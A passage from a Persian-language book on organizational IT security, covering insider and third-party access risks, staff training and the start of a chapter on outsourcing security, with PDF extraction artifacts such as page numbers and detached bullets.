‫ﻛﻪ ﺍﺯ ﺭﻭﻱ ﻣﻴﻞ ﺧﻮﺩﺷﺎﻥ ﻭ ﺑﺮ ﺣـﺴﺐ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻳﻲ ﺍﺳـﺘﺨﺪﺍﻡ‬
‫ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺫﻛﺮ ﺷﺪﻩ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﺴﺌﻮﻝ ﺍﻧﺠـﺎﻡ‬
‫ﭼﻨﻴﻦ ﺍﻗﺪﺍﻣﺎﺗﻲ ﺷﻮﻧﺪ‪ .‬ﺗﺤﺖ ﻫﺮ ﺷﺮﺍﻳﻄﻲ ﺍﺯ ﺩﺍﻧﺶ ﻋﺮﻓﻲ ﺧـﻮﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺷﻤﺎ ﺑﺎﻳﺪ ﺩﻗﻴﻘﹰﺎ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺖ ﺩﺳﺘﺮﺳﻲ‬
‫ﺑﺎﻳﺪ ﭼﻪ ﺑﺎﺷﺪ ﻭ ﺁﻧﺮﺍ ﺑﻮﺿﻮﺡ ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﺍﻓﺮﺍﺩ ﻣـﺴﺌﻮﻝ ﺩﺭ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻴﺎﻥ ﻛﻨﻴﺪ‪.‬‬
‫ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺳﺎﻳﺮ ﻛﺎﺭﻛﻨﺎﻥ‬
‫ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﻫﻤﻮﺍﺭﻩ ﻣﻨﺎﻓﻊ ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺩﺭﻧﻈﺮ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻳـﺎ ﺑـﻪ‬
‫ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﺑﻲﺗﻮﺟﻬﻲ ﻧﺸﺎﻥ‬
‫ﺩﻫﻨﺪ‪ .‬ﮔﺰﺍﺭﺷـﺎﺕ ﺯﻳـﺎﺩﻱ ﺩﺭ ﻣـﻮﺭﺩ ﻭﻗـﻮﻉ ﭼﻨـﻴﻦ ﺍﺗﻔﺎﻗـﺎﺗﻲ ﺩﺭ‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﺧـﺎﻧﻮﺍﺩﮔﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ :‬ﻫﻤﺒﺎﺯﻳﻬـﺎﻱ ﻛﻮﺩﻛـﺎﻥ ﻛـﻪ‬
‫ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛـﺮﺩﻩﺍﻧـﺪ ﻭ ﻳـﺎ ﺍﻓـﺮﺍﺩ‬
‫ﻣﺘﺄﻫﻠﻲ ﻛﻪ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻭ ﺁﮔـﺎﻩ ﺷـﺪﻥ ﺍﺯ ﺧﻴﺎﻧـﺖ‬
‫‪Separation Management‬‬
‫‪99‬‬
‫ﻫﻤﺴﺮﺍﺷﺎﻥ ﺩﺭ ﭘﻴﻮﻧﺪ ﺯﻧﺎﺷﻮﻳﻲ‪ ،‬ﺩﻳﺴﻜﻬﺎ ﺭﺍ ﻣـﻮﺭﺩ ﻭﺍﺭﺳـﻲ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺩﻩﺍﻧــﺪ‪ .‬ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ ﺗﺠــﺎﺭﻱ ﻧﻴــﺰ ﮔﺰﺍﺭﺷــﺎﺗﻲ ﺩﺭ ﻣــﻮﺭﺩ‬
‫ﻧﻈﺎﻓﺘﭽﻲﻫﺎ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﻮﻗﺖ ﺩﻓﺘـﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺣـﻴﻦ‬
‫ﺧﺮﺍﺑﻜﺎﺭﻱ ﻳﺎ ﺟﺎﺳﻮﺳﻲ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺮﻛﺖ ﺩﺳﺘﮕﻴﺮ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﭘﺪﺭ ﻭ ﻣﺎﺩﺭ ﺧﻮﺩ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ‬
‫ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﭼﻪ ﻛﺴﻲ ﺣﻖ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﺮﻛﺖ‬
‫ﺷﻤﺎ ﺩﺍﺭﺩ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺎﺷـﻴﺪ‪ .‬ﺑﺎﺯﺩﻳﺪﻛﻨﻨـﺪﮔﺎﻥ‪ ،‬ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ‬
‫ﺗﻌﻤﻴﺮﺍﺕ‪ ،‬ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ‪ ،‬ﻓﺮﻭﺷﻨﺪﮔﺎﻥ‪ ،‬ﻭ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ ﻫﻤﮕﻲ ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﺑﻪ ﺩﻓﺘﺮ ﻛﺎﺭ ﻭ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﻣﻮﻗﺘﻲ ﻳﺎ ﻧﻴﻤﻪﺩﺍﺋﻤﻲ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺒﻴﻨﻴﺪ ﻫﻤﺔ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺩﻩﺍﻳﻢ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳـﻦ ﺍﻓـﺮﺍﺩ ﺻـﺪﻕ ﻛﻨﻨـﺪ‪ .‬ﺩﺭ‬
‫ﭘﺎﻳــﺎﻥ ﺍﺯ ﻳــﺎﺩ ﻧﺒﺮﻳــﺪ ﻛــﻪ ﻫــﻴﭽﻜﺲ ﺍﺯ ﺑﻴــﺮﻭﻥ ﺍﺩﺍﺭﻩ ﻧﺒﺎﻳــﺪ ﺑــﻪ‬
‫ﻲ ﻧﺎﻣﺤﺪﻭﺩ‬
‫ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪﺍﻱ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜ ﹺ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺳﻮﺍﺑﻖ ﻛﺎﺭﻱ ﺁﻧﻬﺎ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﻣﺘﺼﺪﻳﺎﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ؛‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ﻣﻮﻗﺖ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺩﺍﺭﻧﺪ؛‬
‫ﭘﺮﺳﻨﻞ ﺗﻌﻤﻴﺮﺍﺕ ﻭ ﻧﻈﺎﻓﺖ؛‬
‫ﻧﮕﻬﺒﺎﻧﺎﻥ ﺍﻣﻨﻴﺘﻲ؛‬
‫ﻧﺎﻣﻪﺭﺳﺎﻧﻬﺎ ﻭ ﭘﺮﺳﻨﻞ ﺑﺨﺶ ﺗﺪﺍﺭﻛﺎﺕ ﻛﻪ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎ‬
‫ﺩﺳﺘﺮﺳﻲ ﻣﻌﻤﻮﻟﻲ ﻳﺎ ﺑﺪﻭﻥ ﻧﻈﺎﺭﺕ ﺩﺍﺭﻧﺪ؛‬
‫ﻣﺸﺎﻭﺭﺍﻥ؛‬
‫ﺣﺴﺎﺑﺮﺳﺎﻥ‪ ،‬ﻣﻤﻴﺰﻫﺎ‪ ،‬ﻭ ﺳﺎﻳﺮ ﭘﺮﺳﻨﻞ ﺑﺨﺶ ﻣﺎﻟﻲ‪.‬‬
‫ﺗﻤﺎﻣﻲ ﻛﺎﺭﻛﻨﺎﻧﻲ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧـﺪ ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺍﻣﻨﻴﺖ ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ﺍﺯ ﺧـﺴﺎﺭﺗﻬﺎ ﺁﻣﻮﺯﺷـﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﺑﺒﻴﻨﻨـﺪ ﻭ‬
‫ﻣﻄﺎﻟﺐ ﺁﻣﻮﺯﺷﻲ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﺮﺍﻳﺸﺎﻥ ﺗﻜﺮﺍﺭ ﺷﻮﺩ‪ .‬ﭘﺮﺳـﻨﻞ‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺩﺭ ﺟﺮﻳﺎﻥ ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎ ﻭ ﻧﻴـﺰ‬
‫ﺟﺮﻳﻤﻪﻫﺎﻱ ﻧﻘﺾ ﻣﻘﺮﺭﺍﺕ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺍﺯ ﺟﺎﻧﺐ ﺧﺎﻧﻮﺍﺩﺓ ﺧﻮﺩﺗﺎﻥ ﻣﺘﻮﺟﻪ ﺷﻤﺎ ﺍﺳـﺖ ﺭﺍ ﺍﺯ‬
‫ﻳﺎﺩ ﻧﺒﺮﻳﺪ‪ .‬ﺧﻮﺍﻩ ﺩﺭ ﻣﻨﺰﻝ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣـﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ‬
‫ﺍﻋﻀﺎﻱ ﺧﺎﻧﻮﺍﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﺧﻮﺍﻩ ﻛﻮﺩﻛﺎﻧﺘﺎﻥ ﺭﺍ ﮔﻬﮕﺎﻩ ﺑﺮﺍﻱ‬
‫ﺑﺎﺯﺩﻳﺪ ﺑﻪ ﺍﺩﺍﺭﻩ ﺑﺒﺮﻳﺪ‪ ،‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳـﺖ ﻛـﻪ ﺁﻧﻬـﺎ‬
‫ﺑﺪﺍﻧﻨﺪ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺑﺎﺯﻱ‬
‫ﻧﻴﺴﺖ‪ .‬ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﻳﺎﺩ ﺑﮕﻴﺮﻧﺪ ﻛﻪ ﺑﻪ ﺩﺳﺘﮕﺎﻫﻬﺎ ﻭ ﻭﺳﺎﻳﻞ ﺣﺴﺎﺱ‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫‪١٦٥‬‬
‫ﺗﺠﺎﺭﻱ ﺩﺳﺖ ﻧﺰﻧﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺤﺎﻓﻈﻬـﺎﻱ‬
‫ﻧﻤﺎﻳﺸﮕﺮ ﻣﺠﻬﺰ ﺑﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ‪ ،‬ﺍﻗـﺪﺍﻡ ﭘﻴـﺸﮕﻴﺮﺍﻧﺔ ﻣﻨﺎﺳـﺒﻲ‬
‫ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ‪ .‬ﻋﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺑـﻪ ﺍﻋـﻀﺎﻱ ﺧـﺎﻧﻮﺍﺩﺓ ﺧـﻮﺩ‬
‫ﺑﻴﺎﻣﻮﺯﻳﺪ ﻛﻪ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑـﺎ ﻣﺤـﻴﻂ ﻛـﺎﺭ ﻭ ﺗﺠـﺎﺭﺕ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﻤﺎ ﺑﺎ ﻛﺴﻲ ﺻﺤﺒﺖ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫‪١٦٧‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻣﻬﺎﺭﺗﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺁﻧﻬﺎ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﻓﺼﻞ ﻫﻔﺘﻢ‬
‫‪١٠٠‬‬
‫ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴﺖ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺑﺮﻭﻧﺴﭙﺎﺭﻱ؛ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺑﺮﺍﻱ‬
‫ﻭﺭﻭﺩ ﻧﺎﺧﻮﺍﺳﺘﺔ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﻋﺮﺻﻪﻫﺎﻱ ﺟﺪﻳﺪ‬
‫ﺑﻌﺪ ﺍﺯ ﻣﻄﺎﻟﻌﺔ ﻫﻤﺔ ﻣﻄﺎﻟـﺐ ﻓـﺼﻠﻬﺎﻱ ﮔﺬﺷـﺘﻪ ﺷـﺎﻳﺪ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬـﺎ ﺩﺭ ﻭﺿـﻌﻴﺖ‬
‫ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ؛ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﻨﻮﺯ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ‬
‫ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ؛ ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺣﺠﻢ ﻛﻞ ﻛـﺎﺭ ﺗﺮﺳـﻴﺪﻩ ﺑﺎﺷـﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺟﺰﺀ ﺩﺳﺘﻪ ﺁﺧﺮ ﻫﺴﺘﻴﺪ ﺍﻳﻦ ﺗﺼﻮﺭ ﺭﺍ ﻧﻜﻨﻴﺪ ﻛﻪ ﺍﻧﺠـﺎﻡﺷـﺪﻥ‬
‫ﺁﻥ ﻓﻌﺎﻟﻴﺖ ﺑﺮﺍﻱ ﺷﺮﻛﺖ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥﻧﺎﭘـﺬﻳﺮ ﺍﺳـﺖ‪ .‬ﺭﺍﻫﻬـﺎﻱ‬
‫ﺩﻳﮕﺮﻱ ﻫﻢ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬﺎ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺩﺭ‬
‫ﺍﺩﺍﺭﺓ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ :‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ‪ ،‬ﻣﺸﺎﻭﺭﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ‬
‫ﺧﺎﺭﺝ ﺍﺯ ﺷﺮﻛﺖ‪ .‬ﺣﺘﻲ ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ﺗﺠﺎﺭﺕ ﺍﻧﻔـﺮﺍﺩﻱ ﻛﻮﭼـﻚ‬
‫ﺩﺭ ﻣﻨﺰﻝ ﻳﺎ ﺷﺮﻛﺘﻲ ﻛﻮﭼﻚ ﻛﻪ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻣﻨﺎﻓﻊ ﺗﻘﺴﻴﻢ ﺗﺠـﺎﺭﺏ‬
‫ﺗﺨﺼﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ :‬ﻋﻘﺪ ﻗـﺮﺍﺭﺩﺍﺩ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﺁﻧﺪﺳـﺘﻪ ﺍﺯ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ ﮔـﺮﻭﻩ ﺁﻣـﻮﺯﺵﺩﻳـﺪﻩ ﻭ‬
‫ﺑﺎﺗﺠﺮﺑﻪ ﻛﻪ ﺑﻪ ﻫﻴﭻ ﺍﺩﺍﺭﻩﺍﻱ ﻭﺍﺑﺴﺘﻪ ﻧﻴﺴﺘﻨﺪ ﺭﺍ ﺍﺳﺘﺨﺪﺍﻡ ﻛﻨﻨـﺪ ﻭ‬
‫ﺗﻮﺍﻧﺎﻳﻴﻬﺎﻳــﺸﺎﻥ ﺭﺍ ﺑــﺎ ﻣــﺸﺘﺮﻳﺎﻥ ﻣﺘﻘﺎﺿــﻲ ﺗﻘــﺴﻴﻢ ﻧﻤﺎﻳﻨــﺪ ﻭ‬
‫‪ ۱۰۰‬ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ )‪(Outsourcing‬‬
‫ﺍﮔﺮ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﺑﺨـﺸﻲ ﻣﺨـﺼﻮﺹ ﺗﻬﻴـﺔ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻫﻨﻮﺯ ﻧﺘﻮﺍﻧﺴﺘﻪﺍﻳﺪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬﺎﻱ‬
‫ﺗﺮﻣﻴﻢ ﺍﺯ ﺳﻮﺍﻧﺢ ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺗـﺪﻭﻳﻦ ﻛﻨﻴـﺪ‪،‬‬
‫ﺗﻮﺻﻴﺔ ﻣﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺧـﺎﺭﺝ ﺳـﺎﺯﻣﺎﻧﻲ‬
‫ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ‪ .‬ﭼﻨﺪ ﺳﺎﺯﻣﺎﻥ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﻪ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﮔـﺮ ﭼﻨـﻴﻦ ﺗﺨﺼـﺼﻲ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﺑﺎﺷﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﻫﻢ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻛﻮﺗـﺎﻩﻣـﺪﺕ ﻭ ﻫـﻢ ﺑـﺮﺍﻱ‬
‫ﭘﻲﺭﻳﺰﻱ ﺗﻮﺍﻧﻤﻨﺪﻳﻬﺎﻱ ﺑﻠﻨﺪﻣﺪﺕﺗﺮ )ﺁﻣﻮﺯﺵ ﻭ ﻛﺴﺐ ﺁﮔﺎﻫﻲ( ﺑـﺴﻴﺎﺭ‬
‫ﺍﺭﺯﺷﻤﻨﺪ ﺑﺎﺷﺪ‪.‬‬
‫ﺗﺪﻭﻳﻦ ﻃﺮﺡ ﺍﺟﺮﺍﻳﻲ‬
‫ﺍﻭﻟﻴﻦ ﻗﺪﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﺑﺎﻳـﺪ ﺍﺯ ﭼـﻪ ﺧـﺪﻣﺎﺗﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪:‬‬
‫‪ ۱۰۱‬ﻳﻜﻲ ﺍﺯ ﻧﺘﺎﻳﺞ ﻛﻤﺒﻮﺩ ﻣﺘﺨﺼﺺ ﺁﻣﻮﺯﺵﺩﻳﺪﺓ ﺍﻣﻨﻴﺖ‪ ،‬ﻛﻤﺒﻮﺩ ﻛﺎﺭﻛﻨﺎﻥ ﻭ‬
‫ﻣﻨﺎﺑﻊ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺗﺤـﺼﻴﻼﺕ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻣﺮﺍﻛـﺰ ﺁﻣﻮﺯﺷـﻲ ﻭ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﺍﺳﺖ‪ .‬ﺩﻭﻟﺘﻬﺎ ﻭ ﺻﻨﺎﻳﻊ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﺍﺯ‬
‫ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺗﺨﺼﻴﺺ ﻣﻨﺎﺑﻌﻲ ﺑـﺮﺍﻱ ﻛﻤـﻚ‬
‫ﺑﻪ ﺳﺎﺧﺘﻪﺷﺪﻥ ﺍﻳﻦ ﺣﻮﺯﻩ ﺑﻪ ﺷﺪﺕ ﺷﻜﺴﺖ ﺧﻮﺭﺩﻩﺍﻧﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺑﻴﺮﻭﻧﻲ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ ﺑﻨﮕﺎﻫﻬـﺎﻱ ﺍﻗﺘـﺼﺎﺩ ﹺ‬
‫ﻋﻤﻮﻣﻲ‪ ،‬ﺧﺼﻮﺻﻲ ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻛﻪ ﻧﮕﺮﺍﻥ ﺗﻮﺍﻧﻤﻨﺪﻱ ﻭﺍﻛـﻨﺶ‬
‫ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺑﻪ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻫـﺴﺘﻨﺪ ﮔﺰﻳﻨـﺔ ﻣﻨﺎﺳـﺒﻲ‬
‫ﺍﺳﺖ‪ ،‬ﻭﻟﻲ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺘﻲ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﺩﻗﺖ ﺻﻮﺭﺕ ﮔﻴﺮﺩ ﻭ ﻛﺎﺭﺁﻳﻲ ﺁﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﻛﻨﺘﺮﻝ‬
‫ﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺧﻲ ﺍﺯ ﻣﺰﺍﻳﺎ ﻭ ﻣﻌﺎﻳﺐ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺫﻛﺮ ﺷﺪﻩ ﻭ ﻳﻚ ﺩﺳـﺘﻪ ﺳـﺆﺍﻻﺕ ﻛـﻪ ﭘـﻴﺶ ﺍﺯ ﻧﻬـﺎﻳﻲ ﻛـﺮﺩﻥ‬
‫ﻣﺬﺍﻛﺮﺍﺕ ﺑﺎ ﺷﺮﻛﺎﻱ ﺟﺪﻳﺪ ﺑﺨﺶ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﺳـﺦ ﺩﺍﺩ‬
‫ﻧﻴﺰ ﻋﻨﻮﺍﻥ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﮔﺮ ﺷﻤﺎ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺑﺎﻻﻳﻲ ﺩﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
